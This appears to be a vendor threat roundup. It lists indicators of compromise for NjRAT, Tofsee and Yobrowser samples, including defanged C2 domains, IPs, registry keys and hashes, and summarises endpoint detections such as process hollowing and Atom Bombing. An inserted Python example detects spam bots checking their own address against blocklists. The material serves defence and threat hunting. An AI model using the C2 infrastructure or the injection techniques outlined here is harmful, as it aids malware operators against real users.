                • ed613488a7bdde693d5b819ce946a8e9865426b9ea7cbbab8a867dc4db79d483

                Coverage


                Screenshots of Detection

                AMP



                ThreatGrid



                Win.Packed.NjRAT-6992540-1


                Indicators of Compromise


                Registry Keys | Occurrences
                <HKLM>\System\CurrentControlSet\Services\NapAgent\Shas | 32
                <HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs | 32
                <HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig | 32
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups | 32
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI | 32
                <HKU>\S-1-5-21-2580483871-590521980-3826313501-500 (Value Name: di) | 32
                <HKCU>\ENVIRONMENT (Value Name: SEE_MASK_NOZONECHECKS) | 32
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON (Value Name: ParseAutoexec) | 32
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: 7a6058fe5633bcc68b913467734f0f12) | 1
                <HKCU>\SOFTWARE\7A6058FE5633BCC68B913467734F0F12 (Value Name: [kl]) | 1
                <HKCU>\Software\5d6c253999006e0a364768488fca8056 | 1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: 5d6c253999006e0a364768488fca8056) | 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: 5d6c253999006e0a364768488fca8056) | 1
                <HKCU>\SOFTWARE\5D6C253999006E0A364768488FCA8056 (Value Name: [kl]) | 1
                <HKCU>\Software\81d13862f7a9e91b88ef1cf04880f30b | 1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: 81d13862f7a9e91b88ef1cf04880f30b) | 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: 81d13862f7a9e91b88ef1cf04880f30b) | 1
                <HKCU>\Software\c4356a2f1cc184765354ac346ff3c760 | 1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: c4356a2f1cc184765354ac346ff3c760) | 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: c4356a2f1cc184765354ac346ff3c760) | 1
                <HKCU>\SOFTWARE\81D13862F7A9E91B88EF1CF04880F30B (Value Name: [kl]) | 1
                <HKCU>\SOFTWARE\C4356A2F1CC184765354AC346FF3C760 (Value Name: [kl]) | 1
                <HKCU>\Software\92c90be64c51c97abffcb0136889e008 | 1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: 92c90be64c51c97abffcb0136889e008) | 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: 92c90be64c51c97abffcb0136889e008) | 1
                Mutexes | Occurrences
                \BaseNamedObjects\23f0e3bce589df29a3e6f3e8879b41c1 | 1
                cf56ee275cc59274062dc1b03224ca99 | 1
                7224ecb50ef565a251e4dca6d8280c72 | 1
                ddb5e6e34f69e8c18573f23e18eb66b5 | 1
                dbac86ee556aeefaf987b893994aa8a6 | 1
                9933a39bcdb4ca2ba91ddfbf0eb49c28 | 1
                27e6ba15367cfc6ccdb30fd12c8ebc9a | 1
                551c2891c1a5b14d85bd8205beca398a | 1
                6f548f49442e3cf6cd712e1421ced30b | 1
                ea48d06232228d6119e51286c4c0d7cb | 1
                6843bfb57b172a29eaca1016ea14dd34 | 1
                b6a24dab009c0449997c4b895176ddee | 1
                b17b3051ec3895b563f6189b117c7103 | 1
                61d4512a2b96204a3981459fa733229e | 1
                b1471de1dda54e505e7a2fe5dc250cbd | 1
                5b9aa31356f88f5efd2d650bab2fd205 | 1
                227ae895ae9adabb3c9cc7efd9b8f180 | 1
                cf10c5de3b577ea5f5b8886499972c21 | 1
                89ced9869827e13512140dfd15310bdb | 1
                7a6058fe5633bcc68b913467734f0f12 | 1
                5d6c253999006e0a364768488fca8056 | 1
                81d13862f7a9e91b88ef1cf04880f30b | 1
                c4356a2f1cc184765354ac346ff3c760 | 1
                92c90be64c51c97abffcb0136889e008 | 1
                d8cff2de0df1355a3d74ec30295aa1da | 1
                See JSON for more IOCs
                IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
                2[.]91[.]138[.]2112
                197[.]206[.]180[.]205 | 1
                85[.]170[.]230[.]163 | 1
                185[.]17[.]1[.]245 | 1
                Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
                youwave932[.]no-ip[.]biz | 10
                dmar-ksa[.]ddns[.]net | 3
                karem[.]no-ip[.]org | 3
                alkhorsan[.]linkpc[.]net | 2
                sabridz[.]no-ip[.]biz | 1
                alkhorsan2016[.]no-ip[.]biz | 1
                amiramir[.]noip[.]me | 1
                MSKGH[.]DDNS[.]NET | 1
                mskhe[.]ddns[.]net | 1
                paleb[.]no-ip[.]org | 1
                yeswecan[.]duckdns[.]org | 1
                megatn[.]publicvm[.]com | 1
                Files and or directories created | Occurrences
                %TEMP%\server.exe | 4
                %TEMP%\svchost.exe | 2
                %TEMP%\svhost.exe | 1
                %APPDATA%\google.exe | 1
                %TEMP%\system.exe | 1
                %TEMP%\win32.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\9933a39bcdb4ca2ba91ddfbf0eb49c28.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\27e6ba15367cfc6ccdb30fd12c8ebc9a.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\551c2891c1a5b14d85bd8205beca398a.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\6f548f49442e3cf6cd712e1421ced30b.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\cb0bc0e4b97025e4a12cd7655f373600.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ea48d06232228d6119e51286c4c0d7cb.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\6843bfb57b172a29eaca1016ea14dd34.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\b17b3051ec3895b563f6189b117c7103.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\b6a24dab009c0449997c4b895176ddee.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\61d4512a2b96204a3981459fa733229e.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\b1471de1dda54e505e7a2fe5dc250cbd.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\5b9aa31356f88f5efd2d650bab2fd205.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\cf10c5de3b577ea5f5b8886499972c21.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\89ced9869827e13512140dfd15310bdb.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\7a6058fe5633bcc68b913467734f0f12.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\5d6c253999006e0a364768488fca8056.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\81d13862f7a9e91b88ef1cf04880f30b.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\c4356a2f1cc184765354ac346ff3c760.exe | 1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\92c90be64c51c97abffcb0136889e008.exe | 1
                See JSON for more IOCs
                File Hashes
                • 04675d38c3f123c6cfe12a8b96c840894985d77a044aa009b6f6a2d1d9bd42a5
                • 070a2b244bfb020dc8c3203831e14d3f27f3a3d5a7bc0df2e1a1acc1b7a5b48a
                • 0bfae405fffc2cb791f7eefb7c4d2efe4b76235289e5a043718bc6ed7480c4f1
                • 0c75f012571cc271d8c19d95b714f425bf6f5ef7b09a646c18cd0b99e0050ede
                • 0e37c0759ded6594cf671c82ea8d8404b2c8ad34c8b7c772d4f4bcdbc01f6b28
                • 133d714e145400b9adc0ac24584745443fee2a9cdcda31bd3251264e46c84607
                • 1444bf151e764ffe3402827f60a142f20a0e6060ad8fb80255e1a82c63ec70e0
                • 146054936453e72343079c7c89517cef5a8e270ba827c321ce6c6740775df7c4
                • 19b06c7cf56e2148202b8051d64823817d8c81afd9e6061e6e625b953439b9eb
                • 26f3184e05046a17a8a470a0ca2088a8774641729eb86c6f84310707014dfb6b
                • 2d4c6b0074ca4866f50c7242882e467a65da7f7dc28fd9c2bbd09caa6f99a8d6
                • 369f407ad2e8321d87ac5f32241d7cf2a0e72aae0b8c0caed4f30faa042ed85e
                • 3bb55a41fa1c485c018b03b521beb74a4baea14bc2b89b8b69713e07079771f9
                • 3d0946ab360b335a58789cc81cb5711e438f312426b2477b2777a256f2b772c6
                • 452ec0f00cee0a7ea6c104d9835af5f3999c50b37d22081dee4b47e75b794cad
                • 469d100e0e62a4099313c485e24f134abd32e598a7f65f147342ac7ea9274f2a
                • 4cd937a9a1914666ebe671b2b9f4db59806dbacd6ae784b10f5b625e1448649f
                • 560a570d89a632b81d34cf4d1e20a86c35657d9211ac4061c419883e2b108e63
                • 5da16143a544f7c51cdd146540b5393113a6768162328cfccb5e484c64472ec6
                • 619b638736132bd02470c09508cb63a3fb753c6ee0f8dab4f4af6c2694f9095f
                • 6323174f37df70906257ac7b545eeed4e1cfaea1cbbba74d5acc49230fadcf73
                • 64f50c68d48d152eba786380b7a1db84f94f28c63f34ccb499008e1889ee0675
                • 694a3485ae77c8e024295e34caf2f335eeb61d4ebcda6fd5789086526ae44a9f
                • 6aacdb0640cda4db32f307b91e4d0d6bb4d88429a14308fb90ec573a9c892afb
                • 7530fc29bdc4ae5be727789818541dafcb590bdd708e64e8bde0a4c99b37b2f7
                • See JSON for more IOCs

                Coverage


                Screenshots of Detection

                AMP



                ThreatGrid



                Win.Malware.Tofsee-6992280-0


                Indicators of Compromise


                Registry Keys | Occurrences
                <HKLM>\System\CurrentControlSet\Services\NapAgent\Shas | 17
                <HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs | 17
                <HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel | 17
                <HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig | 17
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups | 17
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI | 17
                <HKU>\.DEFAULT\Control Panel\Buses | 17
                <HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config3) | 17
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\wpdjiqwl) | 3
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\wpdjiqwl | 3
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL (Value Name: Type) | 3
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL (Value Name: Start) | 3
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL (Value Name: ErrorControl) | 3
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL (Value Name: DisplayName) | 3
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL (Value Name: WOW64) | 3
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL (Value Name: ObjectName) | 3
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL (Value Name: Description) | 3
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL (Value Name: ImagePath) | 3
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\gzntsagv) | 2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\gzntsagv | 2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\GZNTSAGV (Value Name: Type) | 2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\GZNTSAGV (Value Name: Start) | 2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\GZNTSAGV (Value Name: ErrorControl) | 2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\GZNTSAGV (Value Name: DisplayName) | 2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\GZNTSAGV (Value Name: WOW64) | 2
                Mutexes | Occurrences
                N/A | -
                IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
                239[.]255[.]255[.]250 | 17
                69[.]55[.]5[.]250 | 17
                192[.]0[.]47[.]59 | 16
                144[.]76[.]199[.]43 | 15
                176[.]111[.]49[.]43 | 15
                46[.]4[.]52[.]109 | 15
                144[.]76[.]199[.]2 | 15
                85[.]25[.]119[.]25 | 15
                43[.]231[.]4[.]7 | 15
                172[.]217[.]164[.]132 | 15
                94[.]23[.]27[.]38 | 15
                216[.]146[.]35[.]35 | 14
                208[.]76[.]51[.]51 | 13
                172[.]217[.]192[.]26 | 13
                74[.]6[.]141[.]40 | 13
                212[.]82[.]101[.]46 | 12
                98[.]136[.]96[.]73 | 12
                98[.]136[.]101[.]116 | 12
                67[.]195[.]228[.]87 | 12
                66[.]218[.]85[.]151 | 12
                213[.]205[.]33[.]63 | 12
                98[.]137[.]157[.]43 | 12
                87[.]250[.]250[.]89 | 12
                74[.]125[.]193[.]26 | 12
                172[.]217[.]6[.]228 | 11
                See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
                250[.]5[.]55[.]69[.]in-addr[.]arpa | 17
                250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org | 17
                250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org | 17
                250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net | 17
                250[.]5[.]55[.]69[.]bl[.]spamcop[.]net | 17
                250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org | 17
                microsoft-com[.]mail[.]protection[.]outlook[.]com | 17
                whois[.]iana[.]org | 16
                whois[.]arin[.]net | 16
                sweety2001[.]dating4you[.]cn | 16
                honeypus[.]rusladies[.]cn | 16
                katarinasw[.]date4you[.]cn | 16
                marina99[.]ruladies[.]cn | 16
                mx-aol[.]mail[.]gm0[.]yahoodns[.]net | 13
                hotmail-com[.]olc[.]protection[.]outlook[.]com | 13
                mx1[.]emailsrvr[.]com | 13
                aol[.]com | 13
                mx-eu[.]mail[.]am0[.]yahoodns[.]net | 12
                tiscali[.]it | 12
                mxs[.]mail[.]ru | 12
                mx[.]yandex[.]net | 12
                mx[.]yandex[.]ru | 12
                msx-smtp-mx2[.]hinet[.]net | 12
                tiscalinet[.]it | 11
                inmx[.]rambler[.]ru | 11
                See JSON for more IOCs
                Files and or directories created | Occurrences
                %SystemRoot%\SysWOW64\config\systemprofile:.repos | 17
                %SystemRoot%\SysWOW64\config\systemprofile | 17
                %HOMEPATH% | 15
                %SystemRoot%\SysWOW64\wpdjiqwl | 3
                %SystemRoot%\SysWOW64\gzntsagv | 2
                %SystemRoot%\SysWOW64\athnmuap | 2
                %SystemRoot%\SysWOW64\slzfemsh | 2
                %TEMP%\utjfmin.exe | 1
                %TEMP%\evorylxw.exe | 1
                %TEMP%\gstniefc.exe | 1
                %TEMP%\otggjiyd.exe | 1
                %TEMP%\edtpwsx.exe | 1
                %TEMP%\uutzkyfi.exe | 1
                %TEMP%\rlnkeakp.exe | 1
                %TEMP%\azlhmwgt.exe | 1
                %TEMP%\wytkbvcv.exe | 1
                %TEMP%\uboorcup.exe | 1
                %TEMP%\uxffdbfo.exe | 1
                %TEMP%\ondzgch.exe | 1
                %TEMP%\arknuhts.exe | 1
                %TEMP%\tyllondi.exe | 1
                %TEMP%\qpfbiej.exe | 1
                %TEMP%\jhokjsqh.exe | 1
                %TEMP%\lkwsxhre.exe | 1
                %TEMP%\pjlicyin.exe | 1
                See JSON for more IOCs
                File Hashes
                • 116bb71b6e6866ba5862d18e5361fe70ad2f9adb3ed8f5f1606e2561bff9fa79
                • 2b9c74a2ffb4d1164048adec4381d151922244be8855026bff683abbf4122684
                • 397ad676785c8e47422e723c081e44172dd935bcfe1389a039ac4bb1013c50c0
                • 59639b75a9ebe2fdcf6ec9623454f06455a5fa6f0a23e47cece96d98c8c0f324
                • 650c6dae8c1553d599d15e7c3d2235a393f498b743538674c7a1d87a8b627d90
                • 7b962ff72c455f123c5ee0ba29aeea11e6fa23d595a0be8aad7b0235d5280d79
                • 85bd864d585a37662a1c6a28daef2ac8c97996e52bf37209e76b0a8a9d6494e1
                • a1fd580e38af18c70ede2540e309a513e85b9a06423aee45f35fbbf1bfa517b9
                • a94cea85efa1c6842892248e1724cd17fb66a34435c9797d9809c3e25a5e6770
                • bad0767a0cf7088aed7904551b26bafd66b4bbc1257518275a1b277f27d1f7a9
                • c3bb4a36939e8f6d2acf8b57b0676ca8c7bafea33cfd15bedecf192f0610e6e9
                • c5ed772f6cb0aa202fb87049bd20063741fd62023f7d9c924876e28711dab3f2
                • de76a7d7af2c38342333014608b75117a2d1868d9020f62fdd117cdfb5ed30fa
                • e1cfadc86259f90b2f1fb5cd23bd267a94ed8c8a2d72035b6e335fd5e68d5866
                • ec4960b3885c4bb63032883cd088585e4f347c4ac9659f49982f999775d90a21
                • f1e790bcc0711047ab255646e07ef7d2fb644c45b24a4bc67250e2c8ee9318a1
                • f7699a1eafb0aded81818b28fd1c897e3e2e22d9d7b4297d97654a5aca09da49
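The Tofsee domain list above deserves a second look. Five of the queries are the same four octets, reversed, under zen.spamhaus.org, sbl-xbl.spamhaus.org, cbl.abuseat.org, dnsbl.sorbs.net and bl.spamcop.net: that is an address (69.55.5.250, which also appears in the IP list) being tested against spam blocklists, the classic check a spam bot makes on the address it is about to send from. That reading is an editor's inference from the IOCs, not a statement from the roundup. The Python below is an added example, not Talos code, that picks this self-check pattern out of a resolver query log. The four-column log format, the client addresses, the comparison mail-server traffic and the thresholds are all constructed or assumed for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Blocklist zones that appear in the Tofsee domain list above.
DNSBL_ZONES = (
    "zen.spamhaus.org",
    "sbl-xbl.spamhaus.org",
    "cbl.abuseat.org",
    "dnsbl.sorbs.net",
    "bl.spamcop.net",
)

# Assumed log shape: "<timestamp> <client> <qtype> <qname>". Adapt to your resolver.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>\S+)\s+(?P<qname>\S+)$")


def dnsbl_lookup(qname):
    """If qname is '<d>.<c>.<b>.<a>.<zone>' for a known DNSBL, return (zone, 'a.b.c.d')."""
    name = qname.rstrip(".").lower()
    for zone in DNSBL_ZONES:
        if not name.endswith("." + zone):
            continue
        labels = name[: -(len(zone) + 1)].split(".")
        if len(labels) != 4:
            return None
        try:
            checked = ipaddress.IPv4Address(".".join(reversed(labels)))
        except ipaddress.AddressValueError:
            return None
        return zone, str(checked)
    return None


def parse_log(text):
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m:
            yield m.groupdict()


def find_self_checks(text, min_zones=3, max_ips=1):
    """Clients that test at most max_ips addresses against at least min_zones lists.

    A mail server that uses DNSBLs legitimately checks many different connecting
    addresses; a spam bot checks one address (its own egress IP) against several
    lists in a burst. Both thresholds are illustrative assumptions.
    """
    per_client = defaultdict(lambda: defaultdict(set))   # client -> ip -> {zones}
    for rec in parse_log(text):
        hit = dnsbl_lookup(rec["qname"])
        if hit is not None:
            zone, ip = hit
            per_client[rec["client"]][ip].add(zone)

    findings = {}
    for client, by_ip in per_client.items():
        if len(by_ip) > max_ips:
            continue
        for ip, zones in by_ip.items():
            if len(zones) >= min_zones:
                findings[client] = {"checked_ip": ip, "zones": sorted(zones)}
    return findings


# Constructed resolver log. 10.0.0.5 reproduces the query pattern from the Tofsee
# IOC list; 10.0.0.25 plays a mail server screening three different senders.
SAMPLE_DNS_LOG = """
2019-05-17T10:01:02Z 10.0.0.5 PTR 250.5.55.69.in-addr.arpa
2019-05-17T10:01:02Z 10.0.0.5 A 250.5.55.69.zen.spamhaus.org
2019-05-17T10:01:02Z 10.0.0.5 A 250.5.55.69.cbl.abuseat.org
2019-05-17T10:01:03Z 10.0.0.5 A 250.5.55.69.dnsbl.sorbs.net
2019-05-17T10:01:03Z 10.0.0.5 A 250.5.55.69.bl.spamcop.net
2019-05-17T10:01:04Z 10.0.0.5 A 250.5.55.69.sbl-xbl.spamhaus.org
2019-05-17T10:01:05Z 10.0.0.5 A mx.yandex.ru
2019-05-17T10:02:10Z 10.0.0.25 A 4.113.0.203.zen.spamhaus.org
2019-05-17T10:02:11Z 10.0.0.25 A 9.113.0.203.zen.spamhaus.org
2019-05-17T10:02:12Z 10.0.0.25 A 17.113.0.203.zen.spamhaus.org
2019-05-17T10:02:12Z 10.0.0.25 A 17.113.0.203.bl.spamcop.net
2019-05-17T10:03:00Z 10.0.0.9 A www.example.com
"""

if __name__ == "__main__":
    for client, info in find_self_checks(SAMPLE_DNS_LOG).items():
        print(client, "checked", info["checked_ip"], "against", ", ".join(info["zones"]))
```

The discriminator is not the blocklist query itself, which any MTA makes, but one client testing a single address against several lists. The PTR lookup of the same reversed octets under in-addr.arpa is deliberately ignored, since reverse lookups are routine; it only corroborates the finding when seen next to the DNSBL burst.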

                Coverage


                Screenshots of Detection

                AMP



                ThreatGrid



                Umbrella



                Win.Malware.Yobrowser-6992453-0


                Indicators of Compromise


                Registry Keys | Occurrences
                <HKCU>\Software\Microsoft\RestartManager\Session0000 | 33
                <HKCU>\SOFTWARE\MICROSOFT\RESTARTMANAGER\SESSION0000 (Value Name: Sequence) | 33
                <HKCU>\SOFTWARE\MICROSOFT\RestartManager | 33
                <HKCU>\SOFTWARE\MICROSOFT\RESTARTMANAGER\SESSION0000 (Value Name: Owner) | 33
                <HKCU>\SOFTWARE\MICROSOFT\RESTARTMANAGER\SESSION0000 (Value Name: SessionHash) | 33
                Mutexes | Occurrences
                Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000 | 33
                Local\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511 | 33
                IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
                N/A | -
                Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
                N/A | -
                Files and or directories created | Occurrences
                %LOCALAPPDATA%\Programs | 33
                %LOCALAPPDATA%\Programs\Common | 33
                %TEMP%\is-C6FN7.tmp\32dfee8be7cca7d0ed5b84fe8deff6d7177042a802586d16c26176ec58952309.tmp | 1
                %TEMP%\is-9HDTO.tmp\_isetup\_setup64.tmp | 1
                %TEMP%\is-9HDTO.tmp\_isetup\_shfoldr.dll | 1
                %TEMP%\is-9HDTO.tmp\trithiweate.dll | 1
                %TEMP%\is-7CPIN.tmp\36ca931623f279c6683ace47e425666510034f5e18441f90e895a3fc6cd2bbdb.tmp | 1
                %TEMP%\is-0142V.tmp\_isetup\_setup64.tmp | 1
                %TEMP%\is-0142V.tmp\_isetup\_shfoldr.dll | 1
                %TEMP%\is-0142V.tmp\trithiweate.dll | 1
                %TEMP%\is-CRK4O.tmp\42827e85051a54995e67aeb54b9418968224f6c299887e4afca574e08b2b76c1.tmp | 1
                %TEMP%\is-Q964A.tmp\482675e5774d1714ae17b5daefd13697fe3a921feb20fc4360065c2135b9c7b0.tmp | 1
                %TEMP%\is-9AA9G.tmp\3f2c22316bc2184f740f39499e41002c6d525a2c4c18dd0b9170c90410a5e4d1.tmp | 1
                %TEMP%\is-T68TS.tmp\4a55c9ceaa100182f6fc1ce9c8ec3c0f9eb58b7841c46c7d1d66fa5eaa4f410e.tmp | 1
                %TEMP%\is-8V9B2.tmp\_isetup\_setup64.tmp | 1
                %TEMP%\is-8V9B2.tmp\_isetup\_shfoldr.dll | 1
                %TEMP%\is-8V9B2.tmp\trithiweate.dll | 1
                %TEMP%\is-P9KOG.tmp\_isetup\_setup64.tmp | 1
                %TEMP%\is-P9KOG.tmp\_isetup\_shfoldr.dll | 1
                %TEMP%\is-FPHCP.tmp\_isetup\_setup64.tmp | 1
                %TEMP%\is-P9KOG.tmp\trithiweate.dll | 1
                %TEMP%\is-FPHCP.tmp\_isetup\_shfoldr.dll | 1
                %TEMP%\is-FPHCP.tmp\trithiweate.dll | 1
                %TEMP%\is-3SHVR.tmp\_isetup\_setup64.tmp | 1
                %TEMP%\is-3SHVR.tmp\_isetup\_shfoldr.dll | 1
                See JSON for more IOCs
                File Hashes
                • 02be7ea7484ce02344237e4aab046aaa3af0f67f5b5bc7530b7757c182008374
                • 0912999b354d903202f981d327670d3dd5a6f37f3c3374cfbf29b9d5dce86e5a
                • 0bd58e14131755d1671174225ea1349a9c9ca54e76a29c2696aab762859ed6ea
                • 1150e22d4d164cd9a07ee28a6c6d33e657e10e1af6f06a3423c56a5f0449b02c
                • 1609b08dc860872a1a37967ec01e9c8d90813e42f4c32a4a5c7651b226bf1c7f
                • 16ee969920278d950596ee85505d40ed1b4265d6fdfa35dc55dd6d188c432614
                • 18c140ae4eb5f0bdff9f07ba176fba6873e5359ff689145bf4d41defec9f635f
                • 224b4f9f98e7d9887ebcae15c02d8973264f31d12ff87a30d696139a316e2cf9
                • 259546449e9e630fbe3bdcfbda7c51de9c1e7bb93022bda08d89bea95ad23a24
                • 26b5593a4e7c8b5accf97029cf6c646c7769cecd36d105153f228f03a20f24be
                • 2e39806e189e988a6bb094359db5aab14638a1737fded6ab00095425672aa13d
                • 2fc0b64cf4ab9d6a6a3b607b999b1e47551bfb62acf143bd08faebf0485157d7
                • 32dfee8be7cca7d0ed5b84fe8deff6d7177042a802586d16c26176ec58952309
                • 36c8f82ff5ebd1647044f14b83dbfb93e1ad5e8e80d95cb2f6e3f463cf4ac94e
                • 36ca931623f279c6683ace47e425666510034f5e18441f90e895a3fc6cd2bbdb
                • 3f2c22316bc2184f740f39499e41002c6d525a2c4c18dd0b9170c90410a5e4d1
                • 42827e85051a54995e67aeb54b9418968224f6c299887e4afca574e08b2b76c1
                • 482675e5774d1714ae17b5daefd13697fe3a921feb20fc4360065c2135b9c7b0
                • 4843bffb11be8da31b059e63973b2f97a3a093cf80b537cb19629f49099a35c4
                • 4a55c9ceaa100182f6fc1ce9c8ec3c0f9eb58b7841c46c7d1d66fa5eaa4f410e
                • 4f349d22bc1cb7e4defbd97debebe906a5408351e7069cf5cc2333338d5be8ed
                • 5677386b0050cff2f5a2c12430999d569dc744944f2f2d9c29f3bab6d5d43edf
                • 5ca1ade829002a58684dc8ff37b11e7b07d91b61a26d89a6736f884d14a0d00f
                • 5ddbe11ee1e50f6a198f1e331e55621fcfc02870f6e8b4e4d5d171bf008938b5
                • 64543ddc78b58da0236310fcee0b447e153d94a4cd393c1975bbe6b000acc960
                • See JSON for more IOCs

                Coverage


                Screenshots of Detection

                AMP



                ThreatGrid



                Exprev

                Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
                • Madshi injection detected (3267)
                  Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions, but malware can use the same technique, so the detection has to be read in the context of what else is running on the host.
                • Kovter injection detected (2041)
                  A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                • Process hollowing detected (1016)
                  Process hollowing is a technique used by some programs to avoid static analysis and to run under the name of a legitimate executable. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then creates a child process in a suspended state, replaces the child's original image in memory with the unpacked payload, and only then resumes the child, so the payload executes while the process still appears to be the benign binary it was launched from.
                • Excessively long PowerShell command detected (676)
                  A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
                • Dealply adware detected (284)
                  DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.
                • Gamarue malware detected (197)
                  Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                • PowerShell file-less infection detected (53)
                  A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion, since the script body never has to exist on disk as a file. This behavior is a known tactic of the Kovter and Poweliks malware families.
                • Atom Bombing code injection technique detected (45)
                  A process created a suspicious atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These atoms are accessible across processes when placed in the global atom table. Malware exploits this by placing shellcode in a global atom, then queuing an Asynchronous Procedure Call (APC) in the target process that retrieves the atom's contents into that process's memory, where the shellcode is subsequently run. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
                • Fusion adware detected (35)
